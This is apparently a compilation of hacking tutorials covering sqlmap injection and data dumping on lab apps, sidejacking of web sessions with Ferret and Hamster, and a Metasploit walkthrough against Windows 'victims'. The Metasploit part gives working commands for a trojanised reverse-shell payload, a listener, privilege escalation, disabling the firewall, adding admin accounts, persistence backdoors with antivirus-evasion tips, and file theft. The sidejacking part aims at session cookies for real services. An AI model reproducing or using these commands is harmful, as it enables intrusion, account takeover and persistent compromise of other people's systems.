SQLMap for post authentication(after login) URL's

Normally users use sqlmap for the url which are available before login. But if there is a possibility of sql injection on a url which appear after login then what to do. If the user try to run sqlmap for the url then normally he gets 302 error. There are multiple way to use sqlmap. We can use sqlmap for after login url also. Here I list down almost all possible way to use sqlmap. And in demonstration I am gonna show how use sqlmap for after login url with cookie option.

SQLMap is a free and an open source tool that is used to detect and exploit SQL injection flaws. It has very nifty features that automate the process of detection and exploitation. SQLmap is also used for database fingerprinting, access underlying file system and execute sql commands.

You can download SQLmap from SourceForge here: http://sourceforge.net/projects/sqlmap/

SQLmap Command

Here is the full list of available options:

Options:

1.     –version show program’s version number and exit

2.     -h, –help show this help message and exit

3.     -v VERBOSE Verbosity level: 0-6 (default 1)

General:

These options can be used to set some general working parameters.

1.      -t TRAFFICFILE Log all HTTP traffic into a textual file

2.      –batch Never ask for user input, use the default behaviour

3.      –charset=CHARSET Force character encoding used for data retrieval

4.      –check-tor Check to see if Tor is used properly

5.      –crawl=CRAWLDEPTH Crawl the website starting from the target url

6.      –csv-del=CSVDEL Delimiting character used in CSV output (default “,”)

7.      –eta Display for each output the estimated time of arrival

8.      –flush-session Flush session file for current target

9.      –forms Parse and test forms on target url

10.  –fresh-queries Ignores query results stored in session file

11.  –hex Uses DBMS hex function(s) for data retrieval

12.  –parse-errors Parse and display DBMS error messages from responses

13.  –replicate Replicate dumped data into a sqlite3 database

14.  –save Save options to a configuration INI file

15.  –tor Use Tor anonymity network

16.  –tor-port=TORPORT Set Tor proxy port other than default

17.  –tor-type=TORTYPE Set Tor proxy type (HTTP – default, SOCKS4 or SOCKS5)

18.  –update Update sqlmap

Target

To specify the target options these are the sqlmap options which can be used to get the desired result from sql injection. there must be one options has to be specify to use the sqlmap.

-d DIRECT Direct connection to the database

1.     -u URL, –url=URL Target URL (specify the target url)

2.     -l LOGFILE Parse targets from Burp or WebScarab proxy logs

3.     -m BULKFILE Scan multiple targets enlisted in a given textual file

4.     -r REQUESTFILE Load HTTP request from a file

5.     -g GOOGLEDORK Process Google dork results as target URLs

6.     -c CONFIGFILE Load options from a configuration INI file

Request:

There are multiple option in sqlmap to specify how to connect to the target url or target address. These options can be used to specify how to connect to the target URL. For the url's, which appear after authentication or after login. We can use cookie parameter to perform attack on the url. Sqlmap can also read the cookie from a file the can be the request and response captured in burp or ZAP and saved as a text file.

1.      –data=DATA Data string to be sent through POST

2.      –param-del=PDEL Character used for splitting parameter values

3.      –cookie=COOKIE HTTP Cookie header

4.      –load-cookies=LOC File containing cookies in Netscape/wget format

5.      –cookie-urlencode URL Encode generated cookie injections

6.      –user-agent=AGENT HTTP User-Agent header

7.      –random-agent Use randomly selected HTTP User-Agent header

8.      –randomize=RPARAM Randomly change value for given parameter(s)

9.      –force-ssl Force usage of SSL/HTTPS requests

10.  –host=HOST HTTP Host header

11.  –referer=REFERER HTTP Referer header

12.  –headers=HEADERS Extra headers (e.g. “Accept-Language: frnETag: 123″)

13.  –auth-type=ATYPE HTTP authentication type (Basic, Digest or NTLM)

14.  –auth-cred=ACRED HTTP authentication credentials (name:password)

15.  –proxy=PROXY Use a HTTP proxy to connect to the target url

16.  –proxy-cred=PCRED HTTP proxy authentication credentials (name:password)

17.  –delay=DELAY Delay in seconds between each HTTP request

18.   –skip-urlencode Skip URL encoding of POST data

19.  –retries=RETRIES Retries when the connection timeouts (default 3)

20.  –scope=SCOPE Regexp to filter targets from provided proxy log

21.  –safe-url=SAFURL Url address to visit frequently during testing

22.  –safe-freq=SAFREQ Test requests between two visits to a given safe url

23.  –timeout=TIMEOUT Seconds to wait before timeout connection

Injection:

SQLMap also accept user defined sql injection payload. In SQLMap we can set which parameter we want to test for sql injections. These options can be used to specify which parameters to test for, and provide custom injection payloads and optional tampering scripts

1.      -p TESTPARAMETER Testable parameter(s)

2.      –dbms=DBMS Force back-end DBMS to this value

3.      –os=OS Force back-end DBMS operating system to this value

4.      –invalid-bignum Use big numbers for invalidating values

5.      –invalid-logical Use logical operations for invalidating values

6.      –no-cast Turn off payload casting mechanism

7.      –prefix=PREFIX Injection payload prefix string

8.      –suffix=SUFFIX Injection payload suffix string

9.      –skip=SKIP Skip testing for given parameter(s)

10.  –tamper=TAMPER Use given script(s) for tampering injection data

Techniques:

These options can be used to tweak testing of specific SQL injection techniques.

1.      –technique=TECH SQL injection techniques to test for (default “BEUST”)

2.      –time-sec=TIMESEC Seconds to delay the DBMS response (default 5)

3.      –union-cols=UCOLS Range of columns to test for UNION query SQL injection

4.      –union-char=UCHAR Character to use for bruteforcing number of columns

5.     –dns-domain=DNAME Domain name used for DNS exfiltration attack

Enumeration:

These options can be used to enumerate the back-end database management system information, structure and data contained in the tables. Moreover you can run your own SQL statements.

1.      -b, –banner Retrieve DBMS banner

2.      –current-user Retrieve DBMS current user

3.      –current-db Retrieve DBMS current database

4.      –is-dba Detect if the DBMS current user is DBA

5.      –users Enumerate DBMS users

6.      –passwords Enumerate DBMS users password hashes

7.      –privileges Enumerate DBMS users privileges

8.      –roles Enumerate DBMS users roles

9.      –dbs Enumerate DBMS databases

10.  –tables Enumerate DBMS database tables

11.  –columns Enumerate DBMS database table columns

12.  –schema Enumerate DBMS schema

13.  –count Retrieve number of entries for table(s)

14.  –dump Dump DBMS database table entries

15.  –dump-all Dump all DBMS databases tables entries

16.  –search Search column(s), table(s) and/or database name(s)

17.  -D DB DBMS database to enumerate

18.  -T TBL DBMS database table to enumerate

19.  -C COL DBMS database table column to enumerate

20.  -U USER DBMS user to enumerate

21.  –exclude-sysdbs Exclude DBMS system databases when enumerating tables

22.  –start=LIMITSTART First query output entry to retrieve

23.  –stop=LIMITSTOP Last query output entry to retrieve

24.  –first=FIRSTCHAR First query output word character to retrieve

25.  –last=LASTCHAR Last query output word character to retrieve

26.  –sql-query=QUERY SQL statement to be executed

27.  –sql-shell Prompt for an interactive SQL shell

Windows registry access:

These options can be used to access the back-end database management system Windows registry.

1.      –reg-read Read a Windows registry key value

2.      –reg-add Write a Windows registry key value data

3.      –reg-del Delete a Windows registry key value

4.      –reg-key=REGKEY Windows registry key

5.      –reg-value=REGVAL Windows registry key value

6.      –reg-data=REGDATA Windows registry key value data

7.      –reg-type=REGTYPE Windows registry key value type

Miscellaneous:

1.      -z MNEMONICS Use short mnemonics (e.g. “flu,bat,ban,tec=EU”)

2.      –beep Sound alert when SQL injection found

3.      –check-payload Offline WAF/IPS/IDS payload detection testing

4.      –check-waf Check for existence of WAF/IPS/IDS protection

5.      –cleanup Clean up the DBMS by sqlmap specific UDF and tables

6.      –dependencies Check for missing sqlmap dependencies

7.      –disable-hash Disable password hash cracking mechanism

8.      –disable-like Disable LIKE search of identificator names

9.      –gpage=GOOGLEPAGE Use Google dork results from specified page number

10.  –mobile Imitate smartphone through HTTP User-Agent header

11.  –page-rank Display page rank (PR) for Google dork results

12.  –purge-output Safely remove all content from output directory

13.  –smart Conduct through tests only if positive heuristic(s)

14.  –test-filter=TSTF Select tests by payloads and/or titles (e.g. ROW)

15.  –wizard Simple wizard interface for beginner users 

Demonstration

As I am using kali linux and sqlmap runs beautifully in this operating system. I am using Virtualbox to run DVWA application in linux based operating system. http://172.16.221.128/dvwa/ is the url where we are going to attack. The application credentials are.

Username : admin

Password: password.

 
After successful login we will navigate to the url:
http://172.16.221.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit# 

If we try sqlmap on the same url with the command:
 sqlmap -u http://172.16.221.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit# --dbs

 

here –dbs is to find databases.

it will give error like this:

As all the security analyst or application security tester all are familiar with burp-suite. If you are not then please go through a burp poxy setting tutorial. If you now how capture a request in proxy (burp-suite) then capture the request in burp and note down the cookie values.

 

Here the cookie values are :

security=low;
PHPSESSID=4c54663dbeac686069a4fd9f05f1b3f9;

 

Now try the sqlmap with this comman:

sqlmap -u "http://172.16.221.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=4c54663dbeac686069a4fd9f05f1b3f9; security=low" –dbs

Used Options:

1.       –dbs: Enumerate DBMS databases

2.       --cookie: cookie value

3.       -u : url

And follow the process.

 

Or you can try with forms options. The command will be like:

sqlmap -u "http://172.16.221.128/dvwa/vulnerabilities/sqli/" --forms --cookie="PHPSESSID=4c54663dbeac686069a4fd9f05f1b3f9; security=low" --dbs

Used Options:

1.       –dbs: Enumerate DBMS databases

these two commands will give the same result.

The out put will be like this 

As we can see the list of databases, now try to find a tables in database dvwa. The command will like:

sqlmap -u "http://172.16.221.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=4c54663dbeac686069a4fd9f05f1b3f9; security=low" -D dvwa –tables

Used Options:

1.       -D : user supplied database name

2.       – tables : enumerate list of tables in the user supplied database

And the output will be like this.

 

Now to see what inside the users tables the command will be like this:

sqlmap -u "http://172.16.221.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=4c54663dbeac686069a4fd9f05f1b3f9; security=low" -D dvwa -T users –dump

Used Options:

1.       -T: user supplied table name

2.       – dump : get all the data inside the user supplied table.

 

The output will be like.

 

OK Lets have some more fun.

To find the current database username try this command.

sqlmap -u "http://172.16.221.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=4c54663dbeac686069a4fd9f05f1b3f9; security=low" –current-user

Used Options:

--current-user : enumerate the current database user name 

This will show you the current database user name. The output will contain some more information like, PHP version, underline operating system, version of the mysql database. Here the username is root.

 

The following command will enumerate all DBMS users and password hashes that can crack it later for any further attacks.

sqlmap -u "http://172.16.221.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=4c54663dbeac686069a4fd9f05f1b3f9; security=low" --string=”Surname” –users –password”

Used Options:

1.       –string : String to match in page when the query is valid

2.       –users : Enumerate DBMS users

3.       –password : Enumerate DBMS users password hashes.

Or get the hashes and try to crack using different methods like john the ripper or any other hash crack tools.

As I try john the ripper for the hash of username smithy. Passsword is admin.

Lets have some more fun.

By using the command:

sqlmap -u "http://172.16.221.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=4c54663dbeac686069a4fd9f05f1b3f9; security=low" –current-use

we are able to know that the current-user is root. Noe try to connect using mysql console.

To connect using mysql console the command will be

 mysql -h 172.16.221.128 -u root -p

 

Now we have full access in the database. Attacker can create update or delete the all records.

 

Blind SQL Injection for Forms fields using SqlMap

SQLMAP

Sqlmap is an automatic SQL injection tool entirely developed in Python. Its goal is to detect and take advantage of SQL injection vulnerabilities on web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user's specific DBMS tables/columns, run his own SQL SELECT statement, read specific files on the file system and much more

Blind SQL Injection for Forms 

Here we vulnerable application Mutillidae that is vulnerable to sql injection. And the attacker system is Kali Linux. As sqlmap already installed in the operation system. To check all the options available in sqlmap you can use command

sqlmap -h

if there is login page that contain a form that have two parameters user-name and password.

Then command for sql map will be  

sqlmap -u https://172.16.221.129/mutillidae/index.php?page=login.php --forms --dbs

Here  172.16.221.129 is my virtual box ip where mutillidae is hosted.

Here --form option is used for form based authentication it will automatically identify how many parameter are there and try to exploit them.

--dbs is used for databases.

After hitting the enter it will automatically identify parameters and ask attacker what type of attack he want to perform.

Enter y here to continue the sql injection.

After hitting enter sqlmap will ask to continue.

Hit enter

again sqlmap will ask what type of data you want to set as payload. By default it will set random values (payload for sql injection). Hit y and enter.

After sending requests using payloads to find sql injection. If its vulnerable sqlmap ask do you want to exploit. Hit y and hit Enter.

If sqlmap prompt user for input like if there is any other type of response from server like 302, then sqlmap ask user do you want to follow that stream. Then hit n and enter

After finish the scanning sqlmap will show the list of databases.

As we can see there is a database name Mutillidae. Now we have to fatch all the data from this database. By using the option -D databasename and --tables we can fatch the tables names in mutillidae database. Now the sqlmap command will be like.

sqlmap -u https://172.16.221.129/mutillidae/index.php?page=login.php --forms -D mutillidae --tables

and follow the same process as of now. The result will be all the tables in database  mutillidae

Now we got all the tables in database mutillidae.  Now we have to fetch all the values inside table accounts. To fetch all the detail the query will be.

sqlmap -u https://172.16.221.129/mutillidae/index.php?page=login.php --forms -D mutillidae -T accounts --dump

-T options is to set table as table name is accounts here and --dump will get all the data inside the table accounts.

The result will be

Now try to login with user-name and password. Like I am trying username – patches and password  tortoise.

Login is successfully done.

Use can also set threads and risk and level by default value for these parameters is 1.  But if we set values more than 1 then sqlmap create complex query to exploit sql injection vulnerability. It will increase the chances to find vulnerabilities and exploit that vulnerability.

Hacking into Users account by Side Jacking

Sidejacking is the process of stealing someone's access to a website, typically done on wireless public networks. To perform sidejacking attack, the application that victim is using must be in http traffic. In order to sidejack access to a website, the bad actor uses a packet sniffer to obtain an unencrypted cookie that will grant access to a specific application. This will allow attacker  to impersonate the user as the session cookie is already providing access to the web application's content.

1) Installing Ferret and Hamster in Ubuntu linux

sudo su

apt-get install libpcap-dev

create a folder with name sidejack in root directory

mkdir sidejack

cd  sidejack

wget http://www.erratasec.com/erratasec.zip

unzip erratasec.zip

mv hamster hamster2

cd hamster2/build/gcc4

make

cd /sidejack /ferret/build/gcc4

make

cd /sidejack

mkdir hamster

cp /sidejack /ferret/bin/ferret /sidejack /hamster

cp /sidejack /hamster2/bin/favicon.ico /sidejack /hamster

cp /sidejack /hamster2/bin/hamster /sidejack /hamster

cp /sidejack /hamster2/bin/hamster.css /sidejack /hamster

cp /pentest/hamster2/bin/hamster.js /sidejack /hamster

2) Capture login credentials packets of any web login(gmail, hotmail etc) through wireshark(run wireshark in promiscuous mode) and save the file as test.pcap under directory /sidejack /hamster2/bin/

3) cd /sidejack /hamster2/bin/

4) ./ferret -r test.pcap (Reads the mail id and necessary login credentials)

5) ./hamster (Starts hamster proxy server on http://127.0.0.1:1234

6) Configure your browser with proxy server as 127.0.0.1 and port as 1234

7) Type http://hamster in your browser.

8) Click on your IP at the bottom of the page that contains email id or any login name with which you logged into previous page while capturing packet earlier.

9) At the right pane, you can see several cookies, click one of them to receive the logged in session of your earlier page. Now your session is hijacked and you can change anything inside the session.

Hack Window 7 x64 window XP x64 using metasploit

Firstly i am telling you don't do this for illegal work  this tutorial is only for knowledge enhancement. or do it on your own risk don't blame me for anything.

Tool require is metasploit.

# Here are some examples on [] from the guide beneath:
# set LHOST [IP ADRESS INT.] = set LHOST 192.168.1.15
# rdesktop [IP]:[port] -u "[USERNAME]" = rdesktop 192.168.1.15:1337 -u "John"
# search -d "[DRIVE:\\FOLDER\\FOLDER]" -f *.jpg = search -d "C:\\windows\\New folder" -f *.jpg
# So when you input anything where there is [], remember to remove the []

-------------------------------------

cd /pentest/exploits/framework3/
svn up
# To update framework3
clear
./msfpayload windows/meterpreter/reverse_tcp LHOST=[YOUR IP ADRESS INT./EXT.] LPORT=[YOUR PORT] R | ./msfencode -c [NUMBER - How many time it will be encoded] -e x86/shikata_ga_nai -x /root/[SOFTWARE_NAME].exe -t exe > /root/[NEW_SOFTWARE_NAME].exe
# If you get encoder error find another EXE or try to encode it less time
# Copy payload to target

-------------------------------------

cd /pentest/exploits/framework3/
clear
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST [IP ADRESS INT.]
set LPORT [PORT] (if used in msfpayload in Shell 1)
show options
exploit


----------
# Now we wait for connection, so start the payload on victim computer
----------

use priv
ps
# Look for PID on explorer.exe
migrate [PID on explorer]
getsystem
sysinfo
# If "Arch = x64" = NO HASHDUMP it won't work
# Now we are in the system
-------------------------------------

shell
# Connect to CMD
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
# Allows incoming terminal service connections
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
# Disables blocking incoming Terminal service connections
Netsh firewall set opmode enable
# Enable Firewall on Victim
Netsh firewall set opmode disable
# Disable Firewall on Victim
net user [USERNAME] [PASSWORD]
# Change password for the user
# Or create you own user
net user [USERNAME] [PASSWORD] /add
net localgroup [GROUP] [USERNAME] /add
# In [GROUP] you could use "administrators" and [USERNAME] is the user you just created
net accounts /maxpwage:[days] | unlimited
# Examples: net accounts /maxpwage:6
# or: net accounts /maxpwage:unlimited

# CTRL + Z then Y to exit shell without it freezing the system

-------------------------------------

{Shell 3} (RDP to compromised system)

# No need for ":" and [PORT] if local
# Remember to be in "root@bt:~#"
rdesktop [IP]:[port] -u "[USERNAME]"
run metsvc (set backdoor for next time you want in)
(OR THIS)
run persistence -r [YOUR IP ADRESS INT./EXT.] -p [YOUR PORT] -A -X -i 300
# 300 tells it to send request for connection every 300 sec. "run persistence -h" for more info
**UP- AND DOWNSIDES USING THIS***
METSVC:
VERY BAD: All 3 files is use gets flagged by Norton Internet Security 2011 as trojan, maybe other AV's will do this too!
BAD: If ip change you have to know the IP to connect back to Victim
GOOD: Easy to use
GOOD: It dosn't request YOUR IP and port!
PERSISTENCE:
BAD: It requests YOUR IP and port!
BAD: Can be more "difficult" to use
GOOD: Flexible
GOOD: Auto Connect
ALMOST GOOD: svchost.exe is reported as suspicious, but NOT as malware! It's only when you run NPE (Norton Power Eraser) it is detected as bad, and will be removed. and that's a tool you must download!

-------------------------------------

{GET BACK INTO SYSTEM} (using metsvc in a new terminal)
cd /pentest/exploits/framework3/
svn up
clear
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/metsvc_bind_tcp
set LPORT 31337 (Must be this port of what i know)
set RHOST [VICTIM IP ADRESS]
show options (see if your setup is correct)
exploit
cd /pentest/exploits/framework3/
svn up
clear
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST [IP ADRESS INT.]
set LPORT [PORT]
# The port set in persistence backdoor
show options
exploit

----------
# Now we wait for connection, it will reconnect to your computer within 300 sec
----------

getuid
# If = "NT AUTHORITY\SYSTEM" do this else go to "use priv":
ps
# Find PID on explorer.exe
steal_token [NUMBER - PID on explorer]
# From what i know it grants you the same rights as the user running that process
use priv
get system
------------------------------------

{Search} (in meterpreter console)

search -f *.jpg
# Finding all JPG files on the system
search -d "[DRIVE:\\FOLDER\\FOLDER]" -f *.jpg
# Finding all JPG filen i a specific folder
searct -f test.txt
# Find a specific file on the whole system
{Uploading and Downloading} (How I use it)
# Use "ls", "pwd" and "cd" to navigate around - see below under commands
Explanation:
Create a txt file on yout BT4 desktop and write any thing in it, or nothing, and save it with the name "test.txt" then in terminal in meterpreter console (after your connected to victim), navigate to the desktop of the user currently logged in.
Use "pwd" without quotes, to check if the path is correct, if it is type the following:

{Upload}
upload /root/test.txt test.txt
# and if you are uploading a file with space in it's name:
upload "/root/test 2.txt" "test 2.txt"
# Or if your not in the path where you want to upload a file, and want it to be uploaded to another folder
upload "/root/test 2.txt" "DRIVE:\\FOLDER\\FOLDER\\test 2.txt"
# Example: upload "/root/test 2.txt" "C:\\test\\test1\\test 2.txt"

{Download}
Explanation:
Now we are going to download the file we just uploaded the "test.txt". Navigate to the folder if your not already in it, by using the "cd", "pwd" and "ls" commands.
Then type:
download test.txt /root/test.txt
# And if you are downloading a file with space in it's name
download "test 2.txt" "/root/test 2.txt"
# Or if your not in the path where you want to download a file from, but know the exact path and name by using search
download "DRIVE:\\FOLDER\\FOLDER\\test 2.txt" "/root/test 2.txt"
# Example: download "C:\\test\\test1\\test 2.txt" "/root/test 2.txt"